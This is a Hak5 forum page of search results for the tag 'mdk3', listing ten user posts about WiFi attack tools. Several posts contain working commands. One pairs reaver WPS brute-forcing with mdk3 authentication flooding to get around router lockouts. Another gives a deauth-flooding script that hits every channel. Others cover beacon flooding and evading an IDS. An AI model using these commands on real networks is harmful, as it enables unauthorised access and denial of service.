Jump to content

Search the Community

Showing results for tags 'mdk3'.

The search index is currently processing. Current results may not be complete.
  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

Found 10 results

  1. More and more routers are becoming resistant to the Reaver magic. That's a good thing, because we all want easy and secure working hardware in our (grand-)parents' homes. But are they really secure? Today I had an encounter with a stubborn fellow that tried to stop me from brutally forcing myself into his backdoor. Good job boy, you kept me out, you're safe! Yeah right... So I fired up another command: mdk3 mon0 a -a [MAC] -m Let that rip for a minute, tried reaver again, bingo! It accepted my brute force methods again. But after a few minutes it locked up again. Time for some more of that mdk3 vaseline, let it rip again, and after reavering it accepted my crowbar. Now my question is, can someone explain to me or show me how to write some kind of script that does this automatically? So it should do this on it's own: reaver -i mon0 -b [MAC] -vv -S When it hits the AP rate limiter: ctrl-C mdk3 mon0 a -a [MAC] -m Run that for a minute or something and then again from the top: reaver -i mon0 -b [MAC] -vv -S When it hits the AP rate limiter: ctrl-C mdk3 mon0 a -a [MAC] -m And so on and so on and so on...
  2. Hi, so i louched an mdk3 after having created the blacklist file with echo and of course having placed the wlan0 in monitor mode (wlan0mon). However there is no output after: mdk3 wlan0mon d -b blacklist -c 1 I have to cancel eventually with control + c. Can somebody help? Thanks P.S using ALFA wireless card and injection works fine, tested with aireplay, also airodump, reaver etc. just MDK3 gives me issues.
  3. I want to limit the pin try so mdk3 save that session show me the time and continue. When mdk3 start its trying pin after 5 pin try it show time and estimated time i want to make mdk3 tell me time after two 2 try how i can do that?
  4. Hi all, I am working on a project that spoofs the geolocation of devices by faking MAC addresses from another place through wifi signals (somewhat similar to this). I have a Raspberry B+, connected to an Alfa AWUS036NH running in monitor mode, connected through ETHERNET with an MBP sharing Internet connection. I am currently able to use Aircrack + mdk3 to create multiple (encrypted) AP within a list of fake MAC addresses, using: sudo mdk3 wlan0mon b -v LIST.txt -g -t And this works perfectly. However I also want, at the same time, to use the same wireless adapter to create an AP (with a hand-assigned MAC address) that shares the internet connection the Raspberry shares via ethernet. Thus, both as a router, and as a "fake AP generator". Is this possible? If not, any ideas of what would be the best workaround? I am doing this for test purposes. The spoofing did not work well only faking unconnectable signals, but my theory is that by also creating an actual access point with a fake mac address, the setup will work better. Thanks in advance. LG.
  5. WiFi Jammer When I turn on WiFi Jammer. it freezes both wlan0 and 1... It is not possible to connect via ethernet cable either. I need to disconnect the power. after this the unit works again. Anyone have any tips on what my problem might be?
  6. I have set a dip switch to run mdk3 beacon flooding. I'm unable to get it working. My switches are as follows: 110: mdk3 wlan1 b -f /root/list.txt 111: airmon-ng start wlan1; mdk3 mon0 b -f /root/list.txt I have also tried putting a sleep 15 in 111 and it doesn't work either. When I ssh in, I can see that mon0 is up but mdk3/beacons are not running/being displayed.
  7. For testing I have a Zyxel Router with an AP (SSID - FUSION) and a laptop connected via wifi to it. The router has no internet just the wifi's AP running. I also have my MKV setup with Karma and Jammer - at this point the Zyxel router is further away from the laptop than the Pineapple. And the Pineapples signal is stronger. When I enable Jammer it doesn't jam/deauth the laptop from Fusion although the jammer's logs says it has sent deauth packets. Tried this many times using different Interfaces and Modes etc. Not sure if im doing something wrong, could someone be kind enough just to put some instructions on how to use Jammer - Do I need to run Monitor Mode!!?? and what Interface should I use wlan0 or wlan1. Many Thanks
  8. Hi Folks, Created a dummy AP via beacon flood attack as such: mdk3 wlan0mon b -n Testing123 While I see "Testing123" when I scan for wireless networks using my phone or another machine, I don't see any output in Terminal when I run the command above. Can anyone tell me what I may be doing wrong? Thanks btw, I'm using pentoo
  9. OK so I saw Darren asking about mdk3 as an alternative to the aircrack suite to deauth. The great thing about using mdk3 instead of the jammer module/aircrack suite is I saw a huge drop in cpu/ram usage:-D ssh into pineapple and issue opkg update [/CODE] and to install mdk to usb, [note] you must use a powered usb hub in order to use more than one device. [CODE] opkg --dest usb install mdk3 ln -s /usb/usr/sbin/mdk3 /usr/sbin/mdk3 [/CODE] or install it to internal memory freeing the one usb port for your wifi card [CODE] opkg install mdk3 [/CODE] now you can create a monitor interface [CODE] airmon-ng start wlan1 [/CODE] and to launch mdk3 [CODE] mdk3 mon0 d -c 1,2,3,4,5,6,7,8,9,10,11 [/CODE] Setting channel hopping from 1 to 11 deauths on all channels:-D about 3 seconds per channel. [NOTE] Currently firmware 2.6.0-1 does not show stations that are being deauthed, but is is working. Full instructions to deauth using mdk3 with an external wifi adapter [CODE] airmon-ng start wlan1 ifconfig wlan0 | awk '/HWaddr/ {print $5}' > whitelist.txt #MAC address of wlan0, pineapple ssid mdk3 mon0 d -w whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11 [/CODE] add any other ap's mac addresses to whitelist.txt that you do not want deauthed, one mac per line. or use the -b option instead "-b blacklist.txt" fill blacklist.txt with mac addresses that you only want deauthed. Now if you want to tie it all to say WM button module I use this script to deauth for 36 seconds (takes 34 seconds to loop back to channel 1, 2+ seconds just in case), it also sets up the whitelist:-D deauth.sh [CODE] #!/bin/sh airmon-ng start wlan1 ifconfig wlan0 | awk '/HWaddr/ {print $5}' > /tmp/deauth-whitelist.txt mdk3 mon0 d -w /tmp/deauth-whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11 & sleep 36 killall -9 mdk3 airmon-ng stop mon0 [/CODE] [note] /tmp/ directory is ram memory, erases every boot This piece of code is very effective at deauthing, plus I love to trigger it via the button module. I should also note that I have been having issues with my alfa nha and run these commands in the start-up script to fix the issue this seems to only be an issue with firmware 2.6.0-1, It sets the physical interface (alfa NHA usually phy1) to wlan1. [CODE] iw phy1 interface add wlan1 type managed iwconfig wlan1 power on [/CODE] also I found rebooting can sometimes make the NHA disappear so I have to unplug both power to the pineapple and usb hub to properly reset
  10. Hey, first post here and I hope I am on the right thread. I am trying to send a single deauth frame. Normally I can send those with aireplay-ng but the -0 1 option actually sends a bach of 128 not 1. This might not be the best idea if the admin is running an IDS for example. I've been trying to find alternative tools for the job with not much luck. Does anyone know if there is a tool or a way with the aircrack-ng suite to do that? Thanks people.
  • Create New...